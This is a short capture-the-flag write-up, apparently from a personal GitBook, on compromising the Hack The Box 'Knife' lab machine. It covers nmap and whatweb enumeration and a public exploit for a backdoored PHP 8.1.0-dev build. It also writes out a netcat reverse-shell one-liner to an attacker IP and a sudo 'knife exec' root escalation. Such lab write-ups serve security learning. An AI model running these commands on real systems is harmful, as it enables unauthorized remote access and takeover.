👀
WriteUps
  • WHOAMI
  • Try Hack Me - THM
    • Linux Boxes
      • Simple CTF
      • Basic Pentesting
      • Kenobi
      • TomGhost
      • Game Zone
      • Skynet
      • Daily Bugle
      • Dogcat
      • Anonymous
      • Wonderland
      • Blog
      • HaskHell
    • Windows Boxes
      • Blue
      • Alfred
      • HackPark
      • Retro
    • Windows Rooms
      • Windows Exploitation
        • Intro to Windows
        • Windows Fundamentals 1
        • Windows Fundamentals 2
      • Active Directory
        • Active Directory Basics
    • Privilege Escalation Rooms
      • Linux
        • Linux PrivEsc
        • Common Linux Privesc
      • Windows
        • Windows PrivEsc
    • Crypto Rooms
      • Hashing - Crypto 101
      • Encryption - Crypto 101
    • Web Rooms
      • OWASP Top 10
        • 1. Injection
        • 2. Broken Authentication
        • 3. Sensitive Data Exposure
        • 4. XML External Entity
        • 5. Broken Access Control
        • 6. Security Misconfiguration
        • 7. Cross-site Scripting
        • 8. Insecure Deserialization
        • 9. Components with Known Vulnerabilities
        • 10. Insufficent Logging & Monitoring
    • MISC
      • Tools
        • John The Ripper
        • Metasploit
      • Git Happens
      • What the Shell?
  • HACK THE BOX - HTB
    • Linux Boxes
      • CAP
      • KNIFE
      • BOUNTYHUNTER
      • PREVISE
      • DYNSTR
      • PIT
      • SEAL
  • VulnHub
    • KIOPTRIX Series
      • KIOPTRIX Level 1 (#1)
      • KIOPTRIX Level 1.1 (#2)
      • KIOPTRIX Level 1.2 (#3)
      • KIOPTRIX Level 1.3 (#4)
    • Privilege Escalation
      • Escalate Linux
      • Escalate My Privilege
    • MISC
      • Misdirection
      • TOPPO
      • NULLBYTE
Powered by GitBook
On this page
  • Scanning
  • Enumeration
  • Exploit
  • Privilege Escalation
  1. HACK THE BOX - HTB
  2. Linux Boxes

KNIFE

Scanning

NMAP

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
|   256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_  256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title:  Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Enumeration

Whatweb

➜  knife.htb sudo whatweb knife.htb      
http://knife.htb [200 OK] Apache[2.4.41], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[10.10.10.242], PHP[8.1.0-dev], Script, Title[Emergent Medical Idea], X-Powered-By[PHP/8.1.0-dev]

Exploit

google search for PHP/8.1.0-dev exploit

find this https://www.exploit-db.com/exploits/49933

just run it ...

➜  knife.htb python3 exploit.py 
Enter the full host url:
http://knife.htb

Interactive shell is opened on http://knife.htb 
Can't acces tty; job crontol turned off.
$ whoami
james

Privilege Escalation

first set reverse shell because above shell have some problems

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.93 4242 >/tmp/f

lets take a look on sudo rights

sudo -l

It can run with /usr/bin/knife as a root. We would execute the following command.

sudo /usr/bin/knife exec --exec "exec '/bin/sh -i'"

We executed the above command and got the root shell.

PreviousCAPNextBOUNTYHUNTER

Last updated 3 years ago